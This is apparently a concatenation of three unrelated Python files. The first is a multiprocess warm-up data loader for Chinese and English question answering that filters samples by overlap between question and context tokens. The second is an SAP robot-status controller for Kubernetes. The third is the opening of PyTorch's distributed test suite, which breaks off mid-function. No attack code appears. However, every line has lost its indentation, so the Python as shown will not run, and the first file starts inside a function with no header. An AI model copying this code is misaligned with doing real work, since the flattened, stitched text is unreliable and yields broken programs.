def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
cat = unicodedata.category(c)
if cat == "Zs":
return True
return False
assert len(examples) == 1
for example in examples:
if len(example.question_text) >= max_warmup_query_length:
return False, None
if do_lower_case:
example_paragraph_text = example.paragraph_text.lower()
raw_doc_tokens = list(jieba.cut(example_paragraph_text))
else:
example_paragraph_text = example.paragraph_text
raw_doc_tokens = list(jieba.cut(example_paragraph_text))
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
k = 0
temp_word = ""
for c in example_paragraph_text:
temp_word += c
char_to_word_offset.append(k)
if temp_word == raw_doc_tokens[k]:
doc_tokens.append(temp_word)
temp_word = ""
k += 1
if k != len(raw_doc_tokens):
print("raw_doc_tokens", raw_doc_tokens)
print("Warning: paragraph '{}' tokenization error ".format(example.paragraph_text))
return False, None
assert type(example.start_positions) == int and type(example.end_positions) == int
start_tok_position = char_to_word_offset[example.start_positions]
end_tok_position = char_to_word_offset[example.end_positions]
left_bound = max(start_tok_position - warmup_window_size, 0)
right_bound = min(end_tok_position + warmup_window_size, len(raw_doc_tokens))
context_tok_list = (
[tok for tok in
raw_doc_tokens[left_bound: start_tok_position]] +
[tok for tok in
raw_doc_tokens[end_tok_position + 1 : right_bound]]
)
comma_num = sum([1 if tok == '、' else 0
for tok in context_tok_list])
if comma_num >= max_comma_num:
return False, None
context_tok_set = set([tok
for tok in context_tok_list if
not (
(
len(tok) == 1 and (_is_punctuation(tok) or \
_is_whitespace(tok) or _is_control(tok))
)
or tok in stopwords
)])
if do_lower_case:
question_tokens = list(jieba.cut(example.question_text.lower(), cut_all = True))
else:
question_tokens = list(jieba.cut(example.question_text, cut_all = True))
question_tok_set = set([tok
for tok in question_tokens if
not (
(
len(tok) == 1 and (_is_punctuation(tok) or \
_is_whitespace(tok) or _is_control(tok))
)
or tok in stopwords
)])
'''if len(context_tok_set) == 0:
print('question_tok_set', question_tok_set)
print('context_tok_set', context_tok_set)
print('context_tok_list', context_tok_list)
print(left_bound, right_bound)
print(start_tok_position, end_tok_position)
print('raw_doc_tokens', raw_doc_tokens)
#print('jaccard', jaccard)'''
if len(context_tok_set) == 0:
return False, context_tok_set
jaccard = float(len(context_tok_set.intersection(question_tok_set)) / len(context_tok_set))
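# Note: this "jaccard" is the overlap |context ∩ question| / |context| measured against
# the window around the answer span, not the symmetric Jaccard index.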
#print('question_tok_set', question_tok_set)
#print('context_tok_set', context_tok_set)
#print('jaccard', jaccard)
if jaccard >= jacc_thres:
#print("return true")
return True, context_tok_set
else:
#print()
return False, context_tok_set
def enqueue(q_list, offset, start_end_list, process_num, stopwords,
loop = True):
print("train file offset: ", offset)
fi = open(args.train_file, 'rb')
cache = [None] * 10000
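# The cache acts as a reservoir-style shuffle buffer: each new feature is written to a
# random slot, and whatever previously occupied that slot is flushed to the queue,
# giving an approximate shuffle of the streamed samples.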
first_time = True
tokenizer = BertTokenizer.from_pretrained(
args.tokenizer, do_lower_case=args.do_lower_case)
chunked_start, chunked_end = start_end_list[process_num]
print("chunked_start, chunked_end", chunked_start, chunked_end)
run_to_eof = False
while True:
if first_time:
fi.seek(int(offset))
first_time = False
if chunked_start > chunked_end:
run_to_eof = True
elif run_to_eof and chunked_start > chunked_end:
fi.seek(0)
run_to_eof = False
else:
if not loop:
print("reached the end of loop, flushing the cache...")
for insert_idx in range(len(cache)):
if cache[insert_idx] is not None:
q_list[process_num].put(cache[insert_idx])
q_list[process_num].put({
'feature': None,
'example': None,
'context_tok_set': None,
'finished': True
})
return
fi.seek(int(chunked_start))
if chunked_start > chunked_end:
run_to_eof = True
for line in fi:
if not run_to_eof and fi.tell() >= chunked_end:
break
try:
line = line.rstrip().decode('utf-8')
sample_json = json.loads(line)
except UnicodeDecodeError:
'''print(f"WARNING: one training line decode utf-8 ERROR")
print(line)
sys.stdout.flush()'''
continue
except json.decoder.JSONDecodeError as json_e:
'''print(f"WARNING: json.decoder.JSONDecodeError ERROR")
print(line)
print(json_e)
sys.stdout.flush()'''
continue
data_processor = PretrainingProcessor()
examples = data_processor.read_chinese_examples(
line_list=[line], is_training=True,
first_answer_only=True,
replace_mask="[unused1]",
do_lower_case=args.do_lower_case,
remove_query_in_passage=args.remove_query_in_passage)
if len(examples) == 0:
continue
is_warmup, context_tok_set = warmup_sample_filter(
examples, stopwords,
jacc_thres = args.jacc_thres,
do_lower_case = args.do_lower_case,
warmup_window_size = args.warmup_window_size,
max_warmup_query_length = args.max_warmup_query_length,
max_comma_num = args.max_comma_num
)
if not is_warmup:
continue
train_features = data_processor.convert_chinese_examples_to_features(
examples=examples,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
doc_stride=args.doc_stride,
max_query_length=args.max_query_length,
is_training=True,
first_answer_only=True)
for feature in train_features:
insert_idx = np.random.randint(0, len(cache))
if cache[insert_idx] is None:
cache[insert_idx] = {
'feature': feature,
'example': sample_json,
'context_tok_set': context_tok_set,
'finished': False
}
else:
q_list[process_num].put(cache[insert_idx])
cache[insert_idx] = {
'feature': feature,
'example': sample_json,
'context_tok_set': context_tok_set,
'finished': False
}
'''q_list[process_num].put()'''
del line
del sample_json
total_bytes = os.path.getsize(args.train_file)
print("train file total bytes: ", total_bytes)
q_list = [Queue(maxsize=32767) for _ in range(args.enqueue_thread_num)]
chunk_size = ((end - start) // args.enqueue_thread_num if end >= start
else (end - start + total_bytes) // args.enqueue_thread_num)
start_end_list = []
for i in range(args.enqueue_thread_num):
start_end_list.append(
((start + chunk_size * i) % total_bytes,
(start + chunk_size * (i + 1)) % total_bytes)
)
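# Each worker gets a byte range [start_i, end_i) of the training file; because the ranges
# are taken modulo total_bytes, a range may wrap around EOF (start_i > end_i), which the
# enqueue loop handles via the run_to_eof flag.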
for i in range(args.enqueue_thread_num): # for fine tuning, thread num CAN be set 1.
# offset = i * np.random.rand() * total_bytes / (args.enqueue_thread_num + 1)
chunked_start, chunked_end = start_end_list[i]
#chunked_start = 0
#chunked_end = total_bytes
#offset = chunked_start #np.random.rand() * (end - start) + start
offset = ((np.random.rand() * (chunked_end - chunked_start + total_bytes) + chunked_start) % total_bytes
if chunked_start > chunked_end else
(np.random.rand() * (chunked_end - chunked_start) + chunked_start) % total_bytes)
print("enqueue process started : ", i, offset, offset / total_bytes)
p = Process(target=enqueue, args=(q_list, offset, start_end_list, i, stopwords('zh'), True))
p.start()
p_list.append(p)
return q_list
def multi_process_get_warmup_data_queue_en(args, start, end, p_list):
def warmup_sample_filter(examples, stopwords, jacc_thres,
do_lower_case, warmup_window_size, max_warmup_query_length,
lemmatizer, translator, neg_drop_rate):
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
cat = unicodedata.category(c)
if cat == "Zs":
return True
return False
def space_tokenize(example_paragraph_text):
raw_doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in example_paragraph_text.translate(translator):
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
raw_doc_tokens.append(c)
else:
raw_doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(raw_doc_tokens) - 1)
return raw_doc_tokens, char_to_word_offset
assert len(examples) == 1
for example in examples:
if (example.orig_answer_text == ''
or example.paragraph_text.find(example.orig_answer_text) == -1):
rand = np.random.uniform(0, 1)
if rand >= neg_drop_rate:
return False, None
if do_lower_case:
example_paragraph_text = example.paragraph_text.strip().lower()
else:
example_paragraph_text = example.paragraph_text.strip()
raw_doc_tokens, char_to_word_offset = space_tokenize(example_paragraph_text)
assert type(example.start_positions) == int and type(example.end_positions) == int
start_tok_position = char_to_word_offset[example.start_positions]
end_tok_position = char_to_word_offset[example.end_positions]
left_bound = max(start_tok_position - warmup_window_size, 0)
right_bound = min(end_tok_position + warmup_window_size, len(raw_doc_tokens))
context_tok_list = (
[tok for tok in
raw_doc_tokens[left_bound: start_tok_position]] +
[tok for tok in
raw_doc_tokens[end_tok_position + 1 : right_bound]]
)
'''comma_num = sum([1 if tok == '、' else 0
for tok in context_tok_list])
if comma_num >= max_comma_num:
return False, None'''
context_tok_set = set([lemmatizer.lemmatize(tok)
for tok in context_tok_list if
not (
(
len(tok) == 1 and (_is_punctuation(tok) or \
_is_whitespace(tok) or _is_control(tok))
)
or tok in stopwords
)])
if do_lower_case:
question_tokens, _ = space_tokenize(example.question_text.lower())
else:
question_tokens, _ = space_tokenize(example.question_text)
if len(question_tokens) >= max_warmup_query_length:
#print(question_tokens)
#print('len---', len(question_tokens))
return False, None
question_tok_set = set([lemmatizer.lemmatize(tok)
for tok in question_tokens if
not (
(
len(tok) == 1 and (_is_punctuation(tok) or \
_is_whitespace(tok) or _is_control(tok))
)
or tok in stopwords
)])
'''if len(context_tok_set) == 0:
print('question_tok_set', question_tok_set)
print('context_tok_set', context_tok_set)
print('context_tok_list', context_tok_list)
print(left_bound, right_bound)
print(start_tok_position, end_tok_position)
print('raw_doc_tokens', raw_doc_tokens)
#print('jaccard', jaccard)'''
if len(context_tok_set) == 0:
return False, context_tok_set
jaccard = float(len(context_tok_set.intersection(question_tok_set)) / len(context_tok_set))
if jaccard >= jacc_thres:
'''print('question_tokens', question_tokens)
print('question_tok_set', question_tok_set)
print('context_tok_list', context_tok_list)
print('context_tok_set', context_tok_set)
print('jaccard', jaccard)'''
return True, context_tok_set
else:
#print()
return False, context_tok_set
def enqueue(q_list, offset, start_end_list, process_num, stopwords,
loop= True):
from nltk.stem import WordNetLemmatizer
print("train file offset: ", offset)
fi = open(args.train_file, 'rb')
cache = [None] * 10000
first_time = True
lemmatizer = WordNetLemmatizer()
translator = str.maketrans(string.punctuation, ' '*len(string.punctuation))
tokenizer = BertTokenizer.from_pretrained(
args.tokenizer, do_lower_case=args.do_lower_case)
chunked_start, chunked_end = start_end_list[process_num]
print("chunked_start, chunked_end", chunked_start, chunked_end)
run_to_eof = False
while True:
#print('first_time:', first_time)
#sys.stdout.flush()
if first_time:
fi.seek(int(offset))
first_time = False
if chunked_start > chunked_end:
run_to_eof = True
elif run_to_eof and chunked_start > chunked_end:
fi.seek(0)
#print("chunked_start, chunked_end, ptr",
# chunked_start, chunked_end, fi.tell())
run_to_eof = False
else:
if not loop:
print("reached the end of loop, flushing the cache...")
for insert_idx in range(len(cache)):
if cache[insert_idx] is not None:
q_list[process_num].put(cache[insert_idx])
q_list[process_num].put({
'feature': None,
'example': None,
'context_tok_set': None,
'finished': True
})
return
fi.seek(int(chunked_start))
if chunked_start > chunked_end:
run_to_eof = True
for line in fi:
if not run_to_eof and fi.tell() >= chunked_end:
break
try:
line = line.rstrip().decode('utf-8')
sample_json = json.loads(line)
except UnicodeDecodeError:
'''print(f"WARNING: one training line decode utf-8 ERROR")
print(line)
sys.stdout.flush()'''
continue
except json.decoder.JSONDecodeError as json_e:
'''print(f"WARNING: json.decoder.JSONDecodeError ERROR")
print(line)
print(json_e)
sys.stdout.flush()'''
continue
data_processor = PretrainingProcessor()
examples = data_processor.read_english_examples(
line_list=[line], is_training=True,
first_answer_only=True,
replace_mask="[unused1]",
do_lower_case=args.do_lower_case)
if len(examples) == 0:
continue
is_warmup, context_tok_set = warmup_sample_filter(
examples, stopwords,
jacc_thres = args.jacc_thres,
do_lower_case = args.do_lower_case,
warmup_window_size = args.warmup_window_size,
max_warmup_query_length = args.max_warmup_query_length,
lemmatizer = lemmatizer,
translator = translator,
neg_drop_rate = args.neg_drop_rate
)
if not is_warmup:
continue
train_features = data_processor.convert_english_examples_to_features(
examples=examples,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
doc_stride=args.doc_stride,
max_query_length=args.max_query_length,
is_training=True,
first_answer_only=True)
for feature in train_features:
insert_idx = np.random.randint(0, len(cache))
if cache[insert_idx] is None:
cache[insert_idx] = {
'feature': feature,
'example': sample_json,
'context_tok_set': context_tok_set,
'finished': False
}
else:
q_list[process_num].put(cache[insert_idx])
cache[insert_idx] = {
'feature': feature,
'example': sample_json,
'context_tok_set': context_tok_set,
'finished': False
}
del line
del sample_json
'''print('process_num', process_num)
print("chunked_start, chunked_end", chunked_start, chunked_end)
print("pointer", fi.tell())
print('line', line)'''
total_bytes = os.path.getsize(args.train_file)
print("train file total bytes: ", total_bytes)
q_list = [Queue(maxsize=32767) for _ in range(args.enqueue_thread_num)]
chunk_size = ((end - start) // args.enqueue_thread_num if end >= start
else (end - start + total_bytes) // args.enqueue_thread_num)
start_end_list = []
for i in range(args.enqueue_thread_num):
start_end_list.append(
((start + chunk_size * i) % total_bytes,
(start + chunk_size * (i + 1)) % total_bytes)
)
for i in range(args.enqueue_thread_num): # for fine tuning, thread num CAN be set 1.
# offset = i * np.random.rand() * total_bytes / (args.enqueue_thread_num + 1)
chunked_start, chunked_end = start_end_list[i]
#offset = chunked_start #np.random.rand() * (end - start) + start
offset = ((np.random.rand() * (chunked_end - chunked_start + total_bytes) + chunked_start) % total_bytes
if chunked_start > chunked_end else
(np.random.rand() * (chunked_end - chunked_start) + chunked_start) % total_bytes)
print("enqueue process started : ", i, offset, offset / total_bytes)
p = Process(target=enqueue, args=(q_list, offset, start_end_list, i, stopwords('en'), True))
p.start()
p_list.append(p)
return q_list
global_q_a_cn_list = None
global_q_b_cn_list = None
global_q_a_en_list = None
global_q_b_en_list = None
global_q = None
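# These module-level queue lists are kept so that code outside this file (e.g. a shutdown
# or cleanup path) can still reach the per-process queues; presumably to drain or discard
# them when the enqueue processes are terminated.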
def get_warmup_training_batch_chinese(args, co_training: bool, p_list: list):
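# Generator that yields warm-up training batches. It splits the training file at a random
# byte offset into two halves and reads each half with its own set of enqueue processes
# (A and B), so each yielded pair (batch_a, batch_b) contains features from the two
# disjoint halves. With co_training=False, batch_a and batch_b are yielded alternately
# instead of as a pair.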
total_bytes = os.path.getsize(args.train_file)
global global_q_a_cn_list
global global_q_b_cn_list
split_byte = np.random.rand() * total_bytes
q_a_list = multi_process_get_warmup_data_queue_cn(args,
split_byte, (split_byte + total_bytes // 2) % total_bytes, p_list)
q_b_list = multi_process_get_warmup_data_queue_cn(args,
(split_byte + total_bytes // 2) % total_bytes, split_byte, p_list)
global_q_a_cn_list = q_a_list
global_q_b_cn_list = q_b_list
feature_buffer = []
batch_indicator = 0
q_ptr = 0
isfinished_set = set()
#fout = open('/Users/noble6emc2/Desktop/Tencent/BLANC/code/src/lm/BLANC/filter_10000.json', 'w', encoding = 'utf-8')
while True:
if len(isfinished_set) == args.enqueue_thread_num:
print("get_batch finished")
return
if q_ptr in isfinished_set:
q_ptr = (q_ptr + 1) % args.enqueue_thread_num
continue
q_a_res = q_a_list[q_ptr].get()
#print(q_a_res['example'])
if q_a_res['finished'] == True:
#print('q_a_finished')
isfinished_set.add(q_ptr)
continue
q_b_res = q_b_list[q_ptr].get()
if q_b_res['finished'] == True:
#print('q_b_finished')
isfinished_set.add(q_ptr)
continue
'''print('===================')
print(q_a_res['example'])
print(q_a_res['context_tok_set'])
print('===================')
print(q_b_res['example'])
print(q_b_res['context_tok_set'])'''
#fout.write(json.dumps(q_a_res['example'], ensure_ascii = False) + '\n')
#fout.write(json.dumps(q_b_res['example'], ensure_ascii = False) + '\n')
new_feature_a = q_a_res['feature']
new_feature_b = q_b_res['feature']
feature_buffer.append((new_feature_a,
new_feature_b))
#print('after q.get')
#sys.stdout.flush()
batch_indicator += 1
if batch_indicator == args.train_batch_size: # ignore the remainder
batch_input_ids = torch.tensor([f.input_ids for f, _ in feature_buffer], dtype=torch.long)
batch_input_mask = torch.tensor([f.input_mask for f, _ in feature_buffer], dtype=torch.long)
batch_segment_ids = torch.tensor([f.segment_ids for f, _ in feature_buffer], dtype=torch.long)
batch_start_positions = torch.tensor([f.start_positions for f, _ in feature_buffer], dtype=torch.long)
batch_end_positions = torch.tensor([f.end_positions for f, _ in feature_buffer], dtype=torch.long)
#print("------------co-training--------------")
#for feature, _ in feature_buffer:
# print(feature)
# break
#print(len(feature_buffer))
batch_a = batch_input_ids, batch_input_mask, batch_segment_ids, batch_start_positions, batch_end_positions
batch_input_ids = torch.tensor([f.input_ids for _, f in feature_buffer], dtype=torch.long)
batch_input_mask = torch.tensor([f.input_mask for _, f in feature_buffer], dtype=torch.long)
batch_segment_ids = torch.tensor([f.segment_ids for _, f in feature_buffer], dtype=torch.long)
batch_start_positions = torch.tensor([f.start_positions for _, f in feature_buffer], dtype=torch.long)
batch_end_positions = torch.tensor([f.end_positions for _, f in feature_buffer], dtype=torch.long)
#print("-------------co-training-------------")
#for _, feature in feature_buffer:
# print(feature)
# break
#print(len(feature_buffer))
batch_b = batch_input_ids, batch_input_mask, batch_segment_ids, batch_start_positions, batch_end_positions
if co_training:
yield batch_a, batch_b
else:
yield batch_a
yield batch_b
batch_indicator = 0
feature_buffer = []
q_ptr = (q_ptr + 1) % args.enqueue_thread_num
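# Minimal usage sketch (assumes an `args` namespace carrying the fields referenced above,
# e.g. train_file, tokenizer, enqueue_thread_num, train_batch_size, ...):
#
#   p_list = []
#   batches = get_warmup_training_batch_chinese(args, co_training=True, p_list=p_list)
#   for batch_a, batch_b in batches:
#       ...  # one co-training step on the paired batches
#   for p in p_list:
#       p.terminate()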
def get_warmup_training_batch_english(args, co_training: bool, p_list: list):
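# Same pipeline as the Chinese variant above, but the underlying filter uses whitespace
# tokenization plus WordNet lemmatization (see multi_process_get_warmup_data_queue_en)
# instead of jieba segmentation.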
total_bytes = os.path.getsize(args.train_file)
global global_q_a_en_list
global global_q_b_en_list
split_byte = np.random.rand() * total_bytes
q_a_list = multi_process_get_warmup_data_queue_en(args,
split_byte, (split_byte + total_bytes // 2) % total_bytes, p_list)
q_b_list = multi_process_get_warmup_data_queue_en(args,
(split_byte + total_bytes // 2) % total_bytes, split_byte, p_list)
global_q_a_en_list = q_a_list
global_q_b_en_list = q_b_list
feature_buffer = []
batch_indicator = 0
q_ptr = 0
isfinished_set = set()
#fout = open('/Users/noble6emc2/Desktop/Tencent/BLANC/code/src/lm/BLANC/filter_10000_en_sspt.json', 'w', encoding = 'utf-8')
while True:
if len(isfinished_set) == args.enqueue_thread_num:
print("get_batch finished")
return
if q_ptr in isfinished_set:
q_ptr = (q_ptr + 1) % args.enqueue_thread_num
continue
q_a_res = q_a_list[q_ptr].get()
#print(q_a_res['example'])
if q_a_res['finished'] == True:
#print('q_a_finished')
isfinished_set.add(q_ptr)
continue
q_b_res = q_b_list[q_ptr].get()
if q_b_res['finished'] == True:
#print('q_b_finished')
isfinished_set.add(q_ptr)
continue
'''print('===================')
print(q_a_res['example'])
print(q_a_res['context_tok_set'])
print('===================')
print(q_b_res['example'])
print(q_b_res['context_tok_set'])'''
'''fout.write(json.dumps(q_a_res['example'], ensure_ascii = False) + '\n')
fout.write(json.dumps(q_b_res['example'], ensure_ascii = False) + '\n')'''
new_feature_a = q_a_res['feature']
new_feature_b = q_b_res['feature']
feature_buffer.append((new_feature_a,
new_feature_b))
#print('after q.get')
#sys.stdout.flush()
batch_indicator += 1
if batch_indicator == args.train_batch_size: # ignore the remainder
batch_input_ids = torch.tensor([f.input_ids for f, _ in feature_buffer], dtype=torch.long)
batch_input_mask = torch.tensor([f.input_mask for f, _ in feature_buffer], dtype=torch.long)
batch_segment_ids = torch.tensor([f.segment_ids for f, _ in feature_buffer], dtype=torch.long)
batch_start_positions = torch.tensor([f.start_positions for f, _ in feature_buffer], dtype=torch.long)
batch_end_positions = torch.tensor([f.end_positions for f, _ in feature_buffer], dtype=torch.long)
#print("------------co-training--------------")
#for feature, _ in feature_buffer:
# print(feature)
# break
#print(len(feature_buffer))
batch_a = batch_input_ids, batch_input_mask, batch_segment_ids, batch_start_positions, batch_end_positions
batch_input_ids = torch.tensor([f.input_ids for _, f in feature_buffer], dtype=torch.long)
batch_input_mask = torch.tensor([f.input_mask for _, f in feature_buffer], dtype=torch.long)
batch_segment_ids = torch.tensor([f.segment_ids for _, f in feature_buffer], dtype=torch.long)
batch_start_positions = torch.tensor([f.start_positions for _, f in feature_buffer], dtype=torch.long)
batch_end_positions = torch.tensor([f.end_positions for _, f in feature_buffer], dtype=torch.long)
#print("-------------co-training-------------")
#for _, feature in feature_buffer:
# print(feature)
# break
#print(len(feature_buffer))
batch_b = batch_input_ids, batch_input_mask, batch_segment_ids, batch_start_positions, batch_end_positions
if co_training:
yield batch_a, batch_b
else:
yield batch_a
yield batch_b
batch_indicator = 0
feature_buffer = []
q_ptr = (q_ptr + 1) % args.enqueue_thread_num
|
robot.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""DummyRobot robot controller."""
import logging
import datetime
import sys
import threading
import traceback
from copy import deepcopy
from kubernetes.client.rest import ApiException
from k8scrhandler.k8scrhandler import K8sCRHandler
from .dummyrobot import DummyRobot
from .helper import get_sample_cr, MainLoopController
_LOGGER = logging.getLogger(__name__)
class RobotController(K8sCRHandler):
"""DummyRobot robot controller."""
def __init__(self, dummy_robot: DummyRobot) -> None:
"""Construct."""
# Instance with Dummy robot
self._dummy_robot = dummy_robot
# Super constructor for robot CR
self.robot_template_cr = get_sample_cr('robco_robot')
super().__init__(
'registry.cloudrobotics.com',
'v1alpha1',
'robots',
'default',
self.robot_template_cr,
{}
)
# Init threads
self.robot_status_update_thread = threading.Thread(target=self._update_robot_status_loop)
def run(self, watcher: bool = True, reprocess: bool = False,
multiple_executor_threads: bool = False) -> None:
"""
Start running all callbacks.
Supports multiple executor threads for blocking callbacks.
"""
super().run(watcher, reprocess, multiple_executor_threads)
# Start update thread
self.robot_status_update_thread.start()
def _update_robot_status_loop(self) -> None:
"""Run update robot status continiously."""
loop_control = MainLoopController()
_LOGGER.info('Watch robot status loop started')
while self.thread_run:
try:
self.update_robot_status()
loop_control.sleep(2)
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
_LOGGER.error(
'%s/%s: Error watching robot status - Exception: "%s" / "%s" - '
'TRACEBACK: %s', self.group, self.plural, exc_info[0], exc_info[1],
traceback.format_exception(*exc_info))
# On uncovered exception in thread save the exception
self.thread_exceptions['status_loop'] = exc
# Stop the watcher
self.stop_watcher()
_LOGGER.info('Watch robot status loop stopped')
def update_robot_status(self) -> None:
"""Update status of robot CR."""
# Update Dummy robot
self._dummy_robot.update()
# Update robot CR status
status = deepcopy(self.robot_template_cr)['status']
status['configuration']['trolleyAttached'] = self._dummy_robot.trolley_attached
status['robot']['batteryPercentage'] = self._dummy_robot.battery_percentage
status['robot']['lastStateChangeTime'] = self._dummy_robot.last_state_change
status['robot']['state'] = self._dummy_robot.state
status['robot']['updateTime'] = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
try:
self.update_cr_status(self._dummy_robot.robco_robot_name, status)
except ApiException:
_LOGGER.error(
'Status CR of robot %s could not be updated', self._dummy_robot.robco_robot_name)
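# Minimal usage sketch (assumes a configured DummyRobot instance named `dummy_robot`):
#
#   controller = RobotController(dummy_robot)
#   controller.run(watcher=True)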
|
test_distributed.py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import copy
import fcntl
import multiprocessing
import os
import sys
import time
import tempfile
import unittest
from contextlib import contextmanager
from datetime import timedelta
from functools import reduce, wraps
import torch
import torch.cuda
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from common_utils import TestCase, run_tests
from torch._utils_internal import TEST_MASTER_ADDR as MASTER_ADDR
from torch._utils_internal import TEST_MASTER_PORT as MASTER_PORT
import common_utils as common
BACKEND = os.environ["BACKEND"]
TEMP_DIR = os.environ["TEMP_DIR"]
INIT_METHOD = os.getenv("INIT_METHOD", "env://")
DEFAULT_TIMEOUT = 300
CUSTOMIZED_TIMEOUT = {"test_DistributedDataParallel": 500}
if INIT_METHOD.startswith("file://"):
FOLDER = INIT_METHOD[7:]
class _FC2(nn.Module):
def __init__(self):
super(_FC2, self).__init__()
self.fc = nn.Linear(10, 50, bias=True)
self.fc.bias.requires_grad = False
def forward(self, x):
x = self.fc(x)
return x
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = _FC2()
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(torch.Tensor([2, 2]).long(),
requires_grad=False)
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
DDP_NET = Net()
def get_timeout(test_id):
test_name = test_id.split(".")[-1]
if test_name in CUSTOMIZED_TIMEOUT:
return CUSTOMIZED_TIMEOUT[test_name]
else:
return DEFAULT_TIMEOUT
if not dist.is_available():
print("Distributed not available, skipping tests")
sys.exit(0)
SKIP_IF_NO_CUDA_EXIT_CODE = 75
SKIP_IF_NO_GPU_EXIT_CODE = 76
SKIP_IF_SMALL_WORLDSIZE_EXIT_CODE = 77
SKIP_IF_BACKEND_UNAVAILABLE = 78
def skip_if_no_cuda_distributed(func):
func.skip_if_no_cuda_distributed = True
@wraps(func)
def wrapper(*args, **kwargs):
if not torch.cuda.is_available():
sys.exit(SKIP_IF_NO_CUDA_EXIT_CODE)
return func(*args, **kwargs)
return wrapper
def skip_if_no_gpu(func):
""" Nccl multigpu tests requires at least 2 GPUS. Skip if this is not met"""
func.skip_if_no_gpu = True
@wraps(func)
def wrapper(*args, **kwargs):
if not torch.cuda.is_available():
sys.exit(SKIP_IF_NO_CUDA_EXIT_CODE)
if torch.cuda.device_count() < int(os.environ["WORLD_SIZE"]):
sys.exit(SKIP_IF_NO_GPU_EXIT_CODE)
return func(*args, **kwargs)
return wrapper
def skip_if_small_worldsize(func):
func.skip_if_small_worldsize = True
@wraps(func)
def wrapper(*args, **kwargs):
if (os.environ["BACKEND"] != "mpi") and int(os.environ["WORLD_SIZE"]) <= 2:
sys.exit(SKIP_IF_SMALL_WORLDSIZE_EXIT_CODE)
return func(*args, **kwargs)
return wrapper
def apply_hack_for_nccl():
# This is a hack for a known NCCL issue: using multiprocessing
# in conjunction with multiple threads to manage different GPUs
# may cause ncclCommInitRank to fail.
# http://docs.nvidia.com/deeplearning/sdk/nccl-release-notes/rel_2.1.4.html#rel_2.1.4
# It slows down the performance of collective operations.
# Without this setting, NCCL might throw an unhandled error.
os.environ["NCCL_MAX_NRINGS"] = "1"
@contextmanager
def _lock():
lockfile = os.path.join(TEMP_DIR, "lockfile")
with open(lockfile, "w") as lf:
try:
fcntl.flock(lf.fileno(), fcntl.LOCK_EX)
yield
finally:
fcntl.flock(lf.fileno(), fcntl.LOCK_UN)
lf.close()
def _build_tensor(size, value=None):
if value is None:
value = size
return torch.FloatTensor(size, size, size).fill_(value)
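# _build_tensor(n, v) produces an n x n x n FloatTensor filled with v (defaulting to n),
# which the tests use as a per-rank / per-source signature in collective ops.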
class Barrier(object):
barrier_id = 0
@classmethod
def init(cls):
cls.barrier_id = 0
barrier_dir = os.path.join(TEMP_DIR, "barrier")
for f_name in os.listdir(barrier_dir):
os.unlink(os.path.join(barrier_dir, f_name))
@classmethod
def sync(cls, wait_for=None, timeout=5):
if wait_for is None:
wait_for = dist.get_world_size()
cls.barrier_id += 1
barrier_dir = os.path.join(TEMP_DIR, "barrier")
pid = str(os.getpid())
barrier_file = os.path.join(barrier_dir, pid)
with _lock():
with open(barrier_file, "w") as f:
f.write(str(cls.barrier_id))
start_time = time.time()
while True:
arrived = 0
with _lock():
for f_name in os.listdir(barrier_dir):
with open(os.path.join(barrier_dir, f_name), "r") as f:
data = f.read()
if int(data) >= cls.barrier_id:
arrived += 1
if arrived == wait_for:
break
if time.time() - start_time > timeout:
raise RuntimeError("barrier timeout")
time.sleep(0.1)
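# The barrier above is file based: every process writes its current barrier_id to a file
# named after its pid under TEMP_DIR/barrier, then polls (under an exclusive flock) until
# `wait_for` files report an id >= its own, or the timeout expires.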
class _DistTestBase(object):
def _barrier(self, *args, **kwargs):
Barrier.sync(*args, **kwargs)
def _init_group_test(self, **kwargs):
group = [1, 2]
group_id = dist.new_group(group, **kwargs)
rank = dist.get_rank()
if rank not in group:
return ([], None, rank)
return (group, group_id, rank)
def _init_full_group_test(self, **kwargs):
group = [i for i in range(0, dist.get_world_size())]
group_id = dist.new_group(**kwargs)
rank = dist.get_rank()
return (group, group_id, rank)
def _init_global_test(self):
group = [i for i in range(0, dist.get_world_size())]
group_id = dist.group.WORLD
rank = dist.get_rank()
return (group, group_id, rank)
# HELPER FOR MULTIGPU TESTS
def _init_multigpu_helper(self):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
nGPUs = torch.cuda.device_count()
world_size = dist.get_world_size()
visible_devices = range(nGPUs)
if BACKEND == "nccl":
apply_hack_for_nccl()
nGPUs_per_process = nGPUs // world_size
rank_to_GPU = {
i: list(
visible_devices[i * nGPUs_per_process: (i + 1) * nGPUs_per_process]
)
for i in range(world_size)
}
return rank_to_GPU
# GET RANK
def test_get_rank(self):
test_dir = os.path.join(TEMP_DIR, "test_dir")
pid = str(os.getpid())
num_processes = dist.get_world_size()
with open(os.path.join(test_dir, pid), "w") as f:
f.write(str(dist.get_rank()))
self._barrier()
all_ranks = set()
for f_name in os.listdir(test_dir):
with open(os.path.join(test_dir, f_name), "r") as f:
all_ranks.add(int(f.read()))
self.assertEqual(len(all_ranks), num_processes)
self._barrier()
if dist.get_rank() == 0:
for f_name in os.listdir(test_dir):
